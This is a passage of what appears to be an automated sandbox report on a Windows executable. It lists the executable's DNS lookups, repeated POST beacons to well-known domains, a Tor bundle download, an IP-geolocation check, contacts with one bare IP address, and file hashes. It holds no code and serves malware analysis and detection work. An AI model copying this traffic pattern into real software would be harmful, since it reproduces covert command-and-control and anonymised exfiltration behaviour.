          Connection: close
        • flag-us
          DNS
          www.eset.com
          B9a5797cb584014f3fede.exe
          Remote address:
          8.8.8.8:53
          Request
          www.eset.com
          IN A
          Response
          www.eset.com
          IN CNAME
          www-eset-com.trafficmanager.net
          www-eset-com.trafficmanager.net
          IN CNAME
          www.eset.com.edgesuite.net
          www.eset.com.edgesuite.net
          IN CNAME
          a1281.dscr.akamai.net
          a1281.dscr.akamai.net
          IN A
          23.72.252.139
          a1281.dscr.akamai.net
          IN A
          23.72.252.169
        • flag-nl
          GET
          https://www.eset.com/yLjHhBPMcU?q=108
          B9a5797cb584014f3fede.exe
          Remote address:
          23.72.252.139:443
          Request
          GET /yLjHhBPMcU?q=108 HTTP/1.1
          Host: www.eset.com
          Connection: Keep-Alive
          Response
          HTTP/1.1 301 Moved Permanently
          Content-Type: text/html
          Content-Length: 162
          Location: https://www.eset.com/yLjHhBPMcU/?q=108
          Referrer-Policy: no-referrer-when-downgrade
          Feature-Policy: accelerometer 'none'; camera 'none'; geolocation 'none'; gyroscope 'none'; magnetometer 'none'; microphone 'none'; payment 'none'; usb 'none'; ambient-light-sensor 'none'; autoplay 'none'; encrypted-media 'none'; fullscreen 'self' https://www.youtube.com; midi 'none'; picture-in-picture 'none'; speaker 'none'; vr 'none'
          X-Frame-Options: SAMEORIGIN
          X-XSS-Protection: 1; mode=block; report=https://eset.report-uri.com/r/d/xss/enforce
          X-Content-Type-Options: nosniff
          Access-Control-Allow-Origin: https://www.eset.com
          Report-To: {"group":"default","max_age":31536000,"endpoints":[{"url":"https://www-eset-com.api.cspconsole.com/v1/csp/report"}],"include_subdomains":false}
          X-EDPS-Request-Status: normal
          Strict-Transport-Security: max-age=15724800
          Cache-Control: public, max-age=3600
          Date: Sat, 14 Oct 2023 18:21:05 GMT
          Connection: keep-alive
          Set-Cookie: TS01a40e5a=016c9a7a13c8dc47858bac5565cb42734e167c28884ace865ff406a08d9afa224f2acc36aba8cf6b18aa3b65e170880536f0466eb1; Path=/; Domain=.eset.com
        • flag-nl
          GET
          https://www.eset.com/yLjHhBPMcU/?q=108
          B9a5797cb584014f3fede.exe
          Remote address:
          23.72.252.139:443
          Request
          GET /yLjHhBPMcU/?q=108 HTTP/1.1
          Host: www.eset.com
          Response
          HTTP/1.1 404 Not Found
          Content-Type: text/html; charset=UTF-8
          Referrer-Policy: no-referrer-when-downgrade
          Feature-Policy: accelerometer 'none'; camera 'none'; geolocation 'none'; gyroscope 'none'; magnetometer 'none'; microphone 'none'; payment 'none'; usb 'none'; ambient-light-sensor 'none'; autoplay 'none'; encrypted-media 'none'; fullscreen 'self' https://www.youtube.com; midi 'none'; picture-in-picture 'none'; speaker 'none'; vr 'none'
          X-Frame-Options: SAMEORIGIN
          X-XSS-Protection: 1; mode=block; report=https://eset.report-uri.com/r/d/xss/enforce
          X-Content-Type-Options: nosniff
          Access-Control-Allow-Origin: https://www.eset.com
          Report-To: {"group":"default","max_age":31536000,"endpoints":[{"url":"https://www-eset-com.api.cspconsole.com/v1/csp/report"}],"include_subdomains":false}
          X-EDPS-Request-Status: normal
          Strict-Transport-Security: max-age=15724800
          Cache-Control: max-age=3600
          Date: Sat, 14 Oct 2023 18:21:07 GMT
          Transfer-Encoding: chunked
          Connection: keep-alive
          Connection: Transfer-Encoding
          Set-Cookie: TS01a40e5a=016c9a7a13ab87b0f065443b2ed3f39c1bb18280ac2041ac6b25757bc8d4f958acd7eb0475fd0b83f85eda1a93f5f6371c8c97d5d1; Path=/; Domain=.eset.com
        • flag-us
          GET
          https://www.pornhub.com/nZJ8XB6TLb?q=129
          B9a5797cb584014f3fede.exe
          Remote address:
          66.254.114.41:443
          Request
          GET /nZJ8XB6TLb?q=129 HTTP/1.1
          Host: www.pornhub.com
          Connection: Keep-Alive
          Response
          HTTP/1.1 302 Found
          server: openresty
          date: Sat, 14 Oct 2023 18:21:05 GMT
          content-type: text/html; charset=UTF-8
          transfer-encoding: chunked
          cache-control: no-cache, no-store, must-revalidate
          pragma: no-cache
          ph-redirect: 1020
          location: http://154.61.71.51
          x-frame-options: SAMEORIGIN
          vary: User-Agent
          rating: RTA-5042-1996-1400-1577-RTA
          set-cookie: __s=652ADC11-42FE722901BB9F2DB-A7F09DF; Secure; Samesite=None
          set-cookie: __l=652ADC11-42FE722901BB9F2DB-A7F09DF; Secure; Samesite=None; Max-Age=31556926
          accept-ch: Sec-CH-UA,Sec-CH-UA-Arch,Sec-CH-UA-Full-Version,Sec-CH-UA-Full-Version-List,Sec-CH-UA-Model,Sec-CH-UA-Platform,Sec-CH-UA-Platform-Version
          strict-transport-security: max-age=63072000; includeSubDomains; preload
        • flag-us
          GET
          https://www.pornhub.com/nZJ8XB6TLb?q=129
          B9a5797cb584014f3fede.exe
          Remote address:
          66.254.114.41:443
          Request
          GET /nZJ8XB6TLb?q=129 HTTP/1.1
          Host: www.pornhub.com
          Response
          HTTP/1.1 302 Found
          server: openresty
          date: Sat, 14 Oct 2023 18:21:05 GMT
          content-type: text/html; charset=UTF-8
          transfer-encoding: chunked
          cache-control: no-cache, no-store, must-revalidate
          pragma: no-cache
          ph-redirect: 1020
          location: http://154.61.71.51
          x-frame-options: SAMEORIGIN
          vary: User-Agent
          rating: RTA-5042-1996-1400-1577-RTA
          set-cookie: __s=652ADC11-42FE722901BB9F2DB-A7F09F5; Secure; Samesite=None
          set-cookie: __l=652ADC11-42FE722901BB9F2DB-A7F09F5; Secure; Samesite=None; Max-Age=31556926
          accept-ch: Sec-CH-UA,Sec-CH-UA-Arch,Sec-CH-UA-Full-Version,Sec-CH-UA-Full-Version-List,Sec-CH-UA-Model,Sec-CH-UA-Platform,Sec-CH-UA-Platform-Version
          strict-transport-security: max-age=63072000; includeSubDomains; preload
        • flag-us
          GET
          https://www.pornhub.com/NXksi90VVl?q=1
          B9a5797cb584014f3fede.exe
          Remote address:
          66.254.114.41:443
          Request
          GET /NXksi90VVl?q=1 HTTP/1.1
          Host: www.pornhub.com
          Connection: Keep-Alive
          Response
          HTTP/1.1 302 Found
          server: openresty
          date: Sat, 14 Oct 2023 18:21:05 GMT
          content-type: text/html; charset=UTF-8
          transfer-encoding: chunked
          cache-control: no-cache, no-store, must-revalidate
          pragma: no-cache
          ph-redirect: 1020
          location: http://154.61.71.51
          x-frame-options: SAMEORIGIN
          vary: User-Agent
          rating: RTA-5042-1996-1400-1577-RTA
          set-cookie: __s=652ADC11-42FE722901BB31F45D-A14844C; Secure; Samesite=None
          set-cookie: __l=652ADC11-42FE722901BB31F45D-A14844C; Secure; Samesite=None; Max-Age=31556926
          accept-ch: Sec-CH-UA,Sec-CH-UA-Arch,Sec-CH-UA-Full-Version,Sec-CH-UA-Full-Version-List,Sec-CH-UA-Model,Sec-CH-UA-Platform,Sec-CH-UA-Platform-Version
          strict-transport-security: max-age=63072000; includeSubDomains; preload
        • 13.107.213.67:80
          http://openai.com/ScdEUc6SlP?q=1
          http
          B9a5797cb584014f3fede.exe
          515 B
          857 B
          6
          6

          HTTP Request

          POST http://openai.com/ScdEUc6SlP?q=1

          HTTP Response

          307
        • 66.254.114.41:80
          http://pornhub.com/nZJ8XB6TLb?q=129
          http
          B9a5797cb584014f3fede.exe
          313 B
          374 B
          5
          4

          HTTP Request

          GET http://pornhub.com/nZJ8XB6TLb?q=129

          HTTP Response

          301
        • 142.250.179.142:80
          http://google.com/xINnIoXK0o?q=0
          http
          B9a5797cb584014f3fede.exe
          394 B
          2.0kB
          6
          6

          HTTP Request

          POST http://google.com/xINnIoXK0o?q=0

          HTTP Response

          404
        • 142.250.179.142:80
          http://google.com/xINnIoXK0o?q=0
          http
          B9a5797cb584014f3fede.exe
          394 B
          2.0kB
          6
          6

          HTTP Request

          POST http://google.com/xINnIoXK0o?q=0

          HTTP Response

          404
        • 159.69.63.226:443
          https://archive.torproject.org/tor-package-archive/torbrowser/12.0.4/tor-expert-bundle-12.0.4-windows-x86_64.tar.gz
          tls, http
          B9a5797cb584014f3fede.exe
          281.5kB
          11.8MB
          4873
          8426

          HTTP Request

          GET https://archive.torproject.org/tor-package-archive/torbrowser/12.0.4/tor-expert-bundle-12.0.4-windows-x86_64.tar.gz

          HTTP Response

          200
        • 66.254.114.41:80
          http://pornhub.com/YvXAWrkHSP?q=0
          http
          B9a5797cb584014f3fede.exe
          514 B
          355 B
          6
          5

          HTTP Request

          POST http://pornhub.com/YvXAWrkHSP?q=0

          HTTP Response

          301
        • 13.107.213.67:80
          http://openai.com/ftOpuXgkwC?q=229
          http
          B9a5797cb584014f3fede.exe
          312 B
          796 B
          5
          5

          HTTP Request

          GET http://openai.com/ftOpuXgkwC?q=229

          HTTP Response

          307
        • 208.95.112.1:80
          http://ip-api.com/line?fields=query,country
          http
          B9a5797cb584014f3fede.exe
          315 B
          407 B
          5
          5

          HTTP Request

          GET http://ip-api.com/line?fields=query,country

          HTTP Response

          200
        • 91.228.166.47:80
          http://eset.com/0O9WHnWMZM?q=0
          http
          B9a5797cb584014f3fede.exe
          499 B
          719 B
          6
          6

          HTTP Request

          POST http://eset.com/0O9WHnWMZM?q=0

          HTTP Response

          301
        • 216.58.214.14:80
          http://youtube.com/wsVZjAbAO0?q=2
          http
          B9a5797cb584014f3fede.exe
          2.5kB
          62.3kB
          38
          61

          HTTP Request

          POST http://youtube.com/Ep3hnbR6IC?q=0

          HTTP Response

          400

          HTTP Request

          POST http://youtube.com/wsVZjAbAO0?q=2

          HTTP Request

          POST http://youtube.com/wsVZjAbAO0?q=2

          HTTP Request

          POST http://youtube.com/wsVZjAbAO0?q=2

          HTTP Request

          POST http://youtube.com/wsVZjAbAO0?q=2

          HTTP Request

          POST http://youtube.com/wsVZjAbAO0?q=2

          HTTP Request

          POST http://youtube.com/wsVZjAbAO0?q=2

          HTTP Request

          POST http://youtube.com/wsVZjAbAO0?q=2

          HTTP Response

          400

          HTTP Response

          400

          HTTP Response

          400

          HTTP Response

          400

          HTTP Response

          400

          HTTP Response

          400

          HTTP Response

          400
        • 216.58.214.14:80
          http://youtube.com/Ep3hnbR6IC?q=0
          http
          B9a5797cb584014f3fede.exe
          2.6kB
          54.7kB
          34
          59

          HTTP Request

          POST http://youtube.com/Ep3hnbR6IC?q=0

          HTTP Response

          400

          HTTP Request

          POST http://youtube.com/wsVZjAbAO0?q=2

          HTTP Response

          400

          HTTP Request

          POST http://youtube.com/Ep3hnbR6IC?q=0

          HTTP Response

          400

          HTTP Request

          POST http://youtube.com/wsVZjAbAO0?q=2

          HTTP Request

          POST http://youtube.com/wsVZjAbAO0?q=2

          HTTP Request

          POST http://youtube.com/wsVZjAbAO0?q=2

          HTTP Response

          400

          HTTP Response

          400

          HTTP Response

          400

          HTTP Request

          POST http://youtube.com/Ep3hnbR6IC?q=0

          HTTP Response

          400
        • 104.16.30.98:80
          http://blockchain.com/GjMLkoZqDj?q=1
          http
          B9a5797cb584014f3fede.exe
          2.1kB
          2.7kB
          14
          13

          HTTP Request

          POST http://blockchain.com/GjMLkoZqDj?q=1

          HTTP Response

          301

          HTTP Request

          POST http://blockchain.com/GjMLkoZqDj?q=1

          HTTP Response

          301

          HTTP Request

          POST http://blockchain.com/GjMLkoZqDj?q=1

          HTTP Response

          301

          HTTP Request

          POST http://blockchain.com/GjMLkoZqDj?q=1

          HTTP Response

          301

          HTTP Request

          POST http://blockchain.com/GjMLkoZqDj?q=1

          HTTP Response

          301
        • 104.16.30.98:80
          http://blockchain.com/GjMLkoZqDj?q=1
          http
          B9a5797cb584014f3fede.exe
          974 B
          1.0kB
          8
          8

          HTTP Request

          POST http://blockchain.com/GjMLkoZqDj?q=1

          HTTP Response

          301

          HTTP Request

          POST http://blockchain.com/GjMLkoZqDj?q=1

          HTTP Response

          301
        • 66.254.114.41:443
          https://pornhub.com/nZJ8XB6TLb?q=129
          tls, http
          B9a5797cb584014f3fede.exe
          747 B
          5.8kB
          8
          9

          HTTP Request

          GET https://pornhub.com/nZJ8XB6TLb?q=129

          HTTP Response

          301
        • 13.107.213.67:443
          https://openai.com/ftOpuXgkwC?q=229
          tls, http
          B9a5797cb584014f3fede.exe
          899 B
          9.9kB
          10
          14

          HTTP Request

          GET https://openai.com/ftOpuXgkwC?q=229

          HTTP Response

          404
        • 66.254.114.41:443
          https://pornhub.com/YvXAWrkHSP?q=0
          tls, http
          B9a5797cb584014f3fede.exe
          739 B
          4.9kB
          8
          8

          HTTP Request

          GET https://pornhub.com/YvXAWrkHSP?q=0

          HTTP Response

          301
        • 13.107.213.67:443
          https://openai.com/ScdEUc6SlP?q=1
          tls, http
          B9a5797cb584014f3fede.exe
          1.1kB
          6.5kB
          10
          15

          HTTP Request

          POST https://openai.com/ScdEUc6SlP?q=1

          HTTP Response

          405
        • 142.250.179.142:80
          http://google.com/xINnIoXK0o?q=0
          http
          B9a5797cb584014f3fede.exe
          370 B
          2.0kB
          6
          6

          HTTP Request

          POST http://google.com/xINnIoXK0o?q=0

          HTTP Response

          404
        • 142.250.179.142:80
          http://google.com/xINnIoXK0o?q=0
          http
          B9a5797cb584014f3fede.exe
          370 B
          2.0kB
          6
          6

          HTTP Request

          POST http://google.com/xINnIoXK0o?q=0

          HTTP Response

          404
        • 104.16.30.98:80
          http://blockchain.com/GjMLkoZqDj?q=1
          http
          B9a5797cb584014f3fede.exe
          956 B
          1.3kB
          8
          7

          HTTP Request

          POST http://blockchain.com/GjMLkoZqDj?q=1

          HTTP Response

          301

          HTTP Request

          POST http://blockchain.com/GjMLkoZqDj?q=1

          HTTP Response

          301
        • 104.16.29.98:443
          www.blockchain.com
          tls
          B9a5797cb584014f3fede.exe
          390 B
          219 B
          5
          5
        • 104.16.30.98:443
          www.blockchain.com
          tls
          B9a5797cb584014f3fede.exe
          390 B
          219 B
          5
          5
        • 23.72.252.169:443
          https://www.eset.com/0O9WHnWMZM/?q=0
          tls, http
          B9a5797cb584014f3fede.exe
          2.7kB
          91.5kB
          49
          82

          HTTP Request

          GET https://www.eset.com/0O9WHnWMZM?q=0

          HTTP Response

          301

          HTTP Request

          GET https://www.eset.com/0O9WHnWMZM/?q=0

          HTTP Response

          404
        • 104.16.30.98:443
          www.blockchain.com
          tls
          B9a5797cb584014f3fede.exe
          390 B
          219 B
          5
          5
        • 104.16.30.98:443
          www.blockchain.com
          tls
          B9a5797cb584014f3fede.exe
          390 B
          219 B
          5
          5
        • 104.16.30.98:443
          www.blockchain.com
          tls
          B9a5797cb584014f3fede.exe
          390 B
          219 B
          5
          5
        • 104.16.30.98:443
          www.blockchain.com
          tls
          B9a5797cb584014f3fede.exe
          390 B
          219 B
          5
          5
        • 66.254.114.41:443
          https://www.pornhub.com/YvXAWrkHSP?q=0
          tls, http
          B9a5797cb584014f3fede.exe
          753 B
          5.6kB
          8
          9

          HTTP Request

          GET https://www.pornhub.com/YvXAWrkHSP?q=0

          HTTP Response

          302
        • 66.254.114.41:443
          https://www.pornhub.com/nZJ8XB6TLb?q=129
          tls, http
          B9a5797cb584014f3fede.exe
          755 B
          5.6kB
          8
          9

          HTTP Request

          GET https://www.pornhub.com/nZJ8XB6TLb?q=129

          HTTP Response

          302
        • 104.16.30.98:443
          www.blockchain.com
          tls
          B9a5797cb584014f3fede.exe
          390 B
          219 B
          5
          5
        • 104.16.30.98:443
          www.blockchain.com
          tls
          B9a5797cb584014f3fede.exe
          390 B
          219 B
          5
          5
        • 104.16.30.98:443
          www.blockchain.com
          tls
          B9a5797cb584014f3fede.exe
          390 B
          219 B
          5
          5
        • 154.61.71.51:80
          B9a5797cb584014f3fede.exe
          152 B
          3
        • 154.61.71.51:80
          B9a5797cb584014f3fede.exe
          152 B
          3
        • 88.221.25.169:80
          http://apps.identrust.com/roots/dstrootcax3.p7c
          http
          B9a5797cb584014f3fede.exe
          323 B
          1.6kB
          4
          4

          HTTP Request

          GET http://apps.identrust.com/roots/dstrootcax3.p7c

          HTTP Response

          200
        • 13.107.213.67:80
          http://openai.com/ftOpuXgkwC?q=229
          http
          B9a5797cb584014f3fede.exe
          266 B
          720 B
          4
          5

          HTTP Request

          GET http://openai.com/ftOpuXgkwC?q=229

          HTTP Response

          307
        • 13.107.213.67:80
          http://openai.com/ScdEUc6SlP?q=1
          http
          B9a5797cb584014f3fede.exe
          515 B
          857 B
          6
          6

          HTTP Request

          POST http://openai.com/ScdEUc6SlP?q=1

          HTTP Response

          307
        • 208.95.112.1:80
          http://ip-api.com/line?fields=query,country
          http
          B9a5797cb584014f3fede.exe
          315 B
          367 B
          5
          4

          HTTP Request

          GET http://ip-api.com/line?fields=query,country

          HTTP Response

          200
        • 66.254.114.41:80
          http://pornhub.com/NXksi90VVl?q=1
          http
          B9a5797cb584014f3fede.exe
          625 B
          496 B
          7
          6

          HTTP Request

          GET http://pornhub.com/nZJ8XB6TLb?q=129

          HTTP Response

          301

          HTTP Request

          POST http://pornhub.com/NXksi90VVl?q=1

          HTTP Response

          301
        • 66.254.114.41:80
          http://pornhub.com/nZJ8XB6TLb?q=129
          http
          B9a5797cb584014f3fede.exe
          307 B
          233 B
          5
          3

          HTTP Request

          GET http://pornhub.com/nZJ8XB6TLb?q=129

          HTTP Response

          301
        • 142.250.179.142:80
          http://google.com/In4oCqfhFE?q=131
          http
          B9a5797cb584014f3fede.exe
          397 B
          3.7kB
          6
          7

          HTTP Request

          GET http://google.com/7jG017oTlL?q=93

          HTTP Response

          404

          HTTP Request

          GET http://google.com/In4oCqfhFE?q=131

          HTTP Response

          404
        • 216.58.214.14:80
          http://youtube.com/wsVZjAbAO0?q=2
          http
          B9a5797cb584014f3fede.exe
          2.7kB
          62.4kB
          38
          64

          HTTP Request

          POST http://youtube.com/Ep3hnbR6IC?q=0

          HTTP Response

          400

          HTTP Request

          POST http://youtube.com/Ep3hnbR6IC?q=0

          HTTP Response

          400

          HTTP Request

          POST http://youtube.com/wsVZjAbAO0?q=2

          HTTP Request

          POST http://youtube.com/wsVZjAbAO0?q=2

          HTTP Request

          POST http://youtube.com/wsVZjAbAO0?q=2

          HTTP Request

          POST http://youtube.com/wsVZjAbAO0?q=2

          HTTP Request

          POST http://youtube.com/wsVZjAbAO0?q=2

          HTTP Request

          POST http://youtube.com/wsVZjAbAO0?q=2

          HTTP Response

          400

          HTTP Response

          400

          HTTP Response

          400

          HTTP Response

          400

          HTTP Response

          400

          HTTP Response

          400
        • 159.69.63.226:443
          https://archive.torproject.org/tor-package-archive/torbrowser/12.0.4/tor-expert-bundle-12.0.4-windows-x86_64.tar.gz
          tls, http
          B9a5797cb584014f3fede.exe
          242.6kB
          11.4MB
          4772
          8179

          HTTP Request

          GET https://archive.torproject.org/tor-package-archive/torbrowser/12.0.4/tor-expert-bundle-12.0.4-windows-x86_64.tar.gz

          HTTP Response

          200
        • 66.254.114.41:443
          https://pornhub.com/NXksi90VVl?q=1
          tls, http
          B9a5797cb584014f3fede.exe
          861 B
          5.8kB
          9
          9

          HTTP Request

          GET https://pornhub.com/nZJ8XB6TLb?q=129

          HTTP Response

          301

          HTTP Request

          GET https://pornhub.com/NXksi90VVl?q=1

          HTTP Response

          301
        • 66.254.114.41:443
          https://pornhub.com/nZJ8XB6TLb?q=129
          tls, http
          B9a5797cb584014f3fede.exe
          741 B
          4.9kB
          8
          8

          HTTP Request

          GET https://pornhub.com/nZJ8XB6TLb?q=129

          HTTP Response

          301
        • 216.58.214.14:80
          http://youtube.com/wsVZjAbAO0?q=2
          http
          B9a5797cb584014f3fede.exe
          2.5kB
          47.0kB
          31
          53

          HTTP Request

          POST http://youtube.com/Ep3hnbR6IC?q=0

          HTTP Response

          400

          HTTP Request

          POST http://youtube.com/Ep3hnbR6IC?q=0

          HTTP Response

          400

          HTTP Request

          POST http://youtube.com/Ep3hnbR6IC?q=0

          HTTP Response

          400

          HTTP Request

          POST http://youtube.com/wsVZjAbAO0?q=2

          HTTP Request

          POST http://youtube.com/wsVZjAbAO0?q=2

          HTTP Request

          POST http://youtube.com/wsVZjAbAO0?q=2

          HTTP Request

          POST http://youtube.com/wsVZjAbAO0?q=2

          HTTP Request

          POST http://youtube.com/wsVZjAbAO0?q=2
        • 91.228.166.47:80
          http://eset.com/yLjHhBPMcU?q=108
          http
          B9a5797cb584014f3fede.exe
          304 B
          656 B
          5
          5

          HTTP Request

          GET http://eset.com/yLjHhBPMcU?q=108

          HTTP Response

          301
        • 104.16.30.98:80
          http://blockchain.com/GjMLkoZqDj?q=1
          http
          B9a5797cb584014f3fede.exe
          1.7kB
          1.8kB
          11
          10

          HTTP Request

          POST http://blockchain.com/GjMLkoZqDj?q=1

          HTTP Response

          301

          HTTP Request

          POST http://blockchain.com/GjMLkoZqDj?q=1

          HTTP Response

          301

          HTTP Request

          POST http://blockchain.com/GjMLkoZqDj?q=1

          HTTP Response

          301

          HTTP Request

          POST http://blockchain.com/GjMLkoZqDj?q=1

          HTTP Response

          301
        • 104.16.30.98:80
          http://blockchain.com/GjMLkoZqDj?q=1
          http
          B9a5797cb584014f3fede.exe
          2.1kB
          2.7kB
          13
          13

          HTTP Request

          POST http://blockchain.com/GjMLkoZqDj?q=1

          HTTP Response

          301

          HTTP Request

          POST http://blockchain.com/GjMLkoZqDj?q=1

          HTTP Response

          301

          HTTP Request

          POST http://blockchain.com/GjMLkoZqDj?q=1

          HTTP Response

          301

          HTTP Request

          POST http://blockchain.com/GjMLkoZqDj?q=1

          HTTP Response

          301

          HTTP Request

          POST http://blockchain.com/GjMLkoZqDj?q=1

          HTTP Response

          301
        • 13.107.213.67:443
          https://openai.com/ftOpuXgkwC?q=229
          tls, http
          B9a5797cb584014f3fede.exe
          899 B
          9.9kB
          10
          14

          HTTP Request

          GET https://openai.com/ftOpuXgkwC?q=229

          HTTP Response

          404
        • 13.107.213.67:443
          https://openai.com/ScdEUc6SlP?q=1
          tls, http
          B9a5797cb584014f3fede.exe
          1.1kB
          6.5kB
          10
          15

          HTTP Request

          POST https://openai.com/ScdEUc6SlP?q=1

          HTTP Response

          405
        • 104.16.30.98:443
          www.blockchain.com
          tls
          B9a5797cb584014f3fede.exe
          390 B
          219 B
          5
          5
        • 142.250.179.142:80
          http://google.com/xINnIoXK0o?q=0
          http
          B9a5797cb584014f3fede.exe
          370 B
          2.0kB
          6
          6

          HTTP Request

          POST http://google.com/xINnIoXK0o?q=0

          HTTP Response

          404
        • 104.16.30.98:443
          www.blockchain.com
          tls
          B9a5797cb584014f3fede.exe
          390 B
          219 B
          5
          5
        • 104.16.30.98:443
          www.blockchain.com
          tls
          B9a5797cb584014f3fede.exe
          390 B
          219 B
          5
          5
        • 104.16.30.98:443
          www.blockchain.com
          tls
          B9a5797cb584014f3fede.exe
          390 B
          219 B
          5
          5
        • 23.72.252.139:443
          https://www.eset.com/yLjHhBPMcU/?q=108
          tls, http
          B9a5797cb584014f3fede.exe
          2.9kB
          92.7kB
          53
          83

          HTTP Request

          GET https://www.eset.com/yLjHhBPMcU?q=108

          HTTP Response

          301

          HTTP Request

          GET https://www.eset.com/yLjHhBPMcU/?q=108

          HTTP Response

          404
        • 104.16.30.98:443
          www.blockchain.com
          tls
          B9a5797cb584014f3fede.exe
          390 B
          219 B
          5
          5
        • 104.16.30.98:443
          www.blockchain.com
          tls
          B9a5797cb584014f3fede.exe
          390 B
          219 B
          5
          5
        • 104.16.30.98:443
          www.blockchain.com
          tls
          B9a5797cb584014f3fede.exe
          390 B
          219 B
          5
          5
        • 104.16.30.98:443
          www.blockchain.com
          tls
          B9a5797cb584014f3fede.exe
          390 B
          219 B
          5
          5
        • 66.254.114.41:443
          https://www.pornhub.com/nZJ8XB6TLb?q=129
          tls, http
          B9a5797cb584014f3fede.exe
          881 B
          6.5kB
          9
          11

          HTTP Request

          GET https://www.pornhub.com/nZJ8XB6TLb?q=129

          HTTP Response

          302

          HTTP Request

          GET https://www.pornhub.com/nZJ8XB6TLb?q=129

          HTTP Response

          302
        • 104.16.30.98:443
          www.blockchain.com
          tls
          B9a5797cb584014f3fede.exe
          390 B
          219 B
          5
          5
        • 66.254.114.41:443
          https://www.pornhub.com/NXksi90VVl?q=1
          tls, http
          B9a5797cb584014f3fede.exe
          799 B
          5.7kB
          9
          9

          HTTP Request

          GET https://www.pornhub.com/NXksi90VVl?q=1

          HTTP Response

          302
        • 154.61.71.51:80
          B9a5797cb584014f3fede.exe
          152 B
          3
        • 154.61.71.51:80
          B9a5797cb584014f3fede.exe
          152 B
          3
        • 8.8.8.8:53
          pornhub.com
          dns
          B9a5797cb584014f3fede.exe
          57 B
          73 B
          1
          1

          DNS Request

          pornhub.com

          DNS Response

          66.254.114.41

        • 8.8.8.8:53
          google.com
          dns
          B9a5797cb584014f3fede.exe
          56 B
          72 B
          1
          1

          DNS Request

          google.com

          DNS Response

          142.250.179.142

        • 8.8.8.8:53
          openai.com
          dns
          B9a5797cb584014f3fede.exe
          56 B
          88 B
          1
          1

          DNS Request

          openai.com

          DNS Response

          13.107.213.67
          13.107.246.67

        • 8.8.8.8:53
          google.com
          dns
          B9a5797cb584014f3fede.exe
          56 B
          72 B
          1
          1

          DNS Request

          google.com

          DNS Response

          142.250.179.142

        • 8.8.8.8:53
          pornhub.com
          dns
          B9a5797cb584014f3fede.exe
          57 B
          73 B
          1
          1

          DNS Request

          pornhub.com

          DNS Response

          66.254.114.41

        • 8.8.8.8:53
          youtube.com
          dns
          B9a5797cb584014f3fede.exe
          57 B
          73 B
          1
          1

          DNS Request

          youtube.com

          DNS Response

          216.58.214.14

        • 8.8.8.8:53
          ip-api.com
          dns
          B9a5797cb584014f3fede.exe
          56 B
          72 B
          1
          1

          DNS Request

          ip-api.com

          DNS Response

          208.95.112.1

        • 8.8.8.8:53
          blockchain.com
          dns
          B9a5797cb584014f3fede.exe
          60 B
          92 B
          1
          1

          DNS Request

          blockchain.com

          DNS Response

          104.16.30.98
          104.16.29.98

        • 8.8.8.8:53
          youtube.com
          dns
          B9a5797cb584014f3fede.exe
          57 B
          73 B
          1
          1

          DNS Request

          youtube.com

          DNS Response

          216.58.214.14

        • 8.8.8.8:53
          eset.com
          dns
          B9a5797cb584014f3fede.exe
          54 B
          86 B
          1
          1

          DNS Request

          eset.com

          DNS Response

          91.228.166.47
          91.228.167.128

        • 8.8.8.8:53
          archive.torproject.org
          dns
          B9a5797cb584014f3fede.exe
          68 B
          109 B
          1
          1

          DNS Request

          archive.torproject.org

          DNS Response

          159.69.63.226

        • 8.8.8.8:53
          blockchain.com
          dns
          B9a5797cb584014f3fede.exe
          60 B
          92 B
          1
          1

          DNS Request

          blockchain.com

          DNS Response

          104.16.30.98
          104.16.29.98

        • 8.8.8.8:53
          www.blockchain.com
          dns
          B9a5797cb584014f3fede.exe
          64 B
          96 B
          1
          1

          DNS Request

          www.blockchain.com

          DNS Response

          104.16.29.98
          104.16.30.98

        • 8.8.8.8:53
          www.eset.com
          dns
          B9a5797cb584014f3fede.exe
          58 B
          204 B
          1
          1

          DNS Request

          www.eset.com

          DNS Response

          23.72.252.169
          23.72.252.139

        • 8.8.8.8:53
          www.blockchain.com
          dns
          B9a5797cb584014f3fede.exe
          64 B
          96 B
          1
          1

          DNS Request

          www.blockchain.com

          DNS Response

          104.16.30.98
          104.16.29.98

        • 8.8.8.8:53
          www.pornhub.com
          dns
          B9a5797cb584014f3fede.exe
          61 B
          91 B
          1
          1

          DNS Request

          www.pornhub.com

          DNS Response

          66.254.114.41

        • 8.8.8.8:53
          apps.identrust.com
          dns
          B9a5797cb584014f3fede.exe
          64 B
          165 B
          1
          1

          DNS Request

          apps.identrust.com

          DNS Response

          88.221.25.169
          88.221.25.153

        • 8.8.8.8:53
          www.eset.com
          dns
          B9a5797cb584014f3fede.exe
          58 B
          204 B
          1
          1

          DNS Request

          www.eset.com

          DNS Response

          23.72.252.139
          23.72.252.169

        MITRE ATT&CK Enterprise v15


        Downloads

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

          Filesize

          304B

          MD5

          87cc804f6e73530988948ebe47d975d5

          SHA1

          dbf42b40ae3c0e3843c86822ce20707e1e5df516

          SHA256

          d427c0c4bf1beb96329e6ba2d36465a6adb52835f54d65fd014de4e12f394c30

          SHA512

          8f8bb14e057db83c51fa211794de4732e7b2f2966138c8d32954e8d87d851cc83d36fce69b422d7391cd1ce5a2707911d69383586a92306f744780db149dadf5

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

          Filesize

          304B

          MD5

          29208f21708f4ef952fd34ec344ff543

          SHA1

          b62648136a0a85e072eef0b61780617c85dd47f6

          SHA256

          b1460e692cf321b551b5c59985366cce16f5b95733a2b3429e34cc97f80e30bd

          SHA512

          8592c7cf8fd24242d4f0fea19ccb7255cd84548d2f2412ec2d1ceb20802a46f536c71503c8d0a9925dea1c3505544d458ce3e7399c7fcf7fa9a0422b57b1943e

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

          Filesize

          304B

          MD5

          f90087d2936cef6801995f27da4e96d1

          SHA1

          782166adfec0f45da26a0b6009e88ffc1b736406

          SHA256

          bfbcebf3bb9e4d032a16728eed2822eaf50e3eed98d9f930591f58217316eac6

          SHA512

          e6163d04fd47788d8e7baffb0de2084ff3de59ba03db9e48fe56da93a9d232a9cf5f00265edf84eca5a88dda54a6355b2e44cdaf09da289d668967f886bbfa1a

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

          Filesize

          304B

          MD5

          d91c538098a7de47b5c41190987f010f

          SHA1

          8f07e34c5f0284e273ba27a4434fef5e930fc41d

          SHA256

          08fee11887c2052f2e862df9cf7c347dc655155498d6cf9fa9497a6e397c2e6c

          SHA512

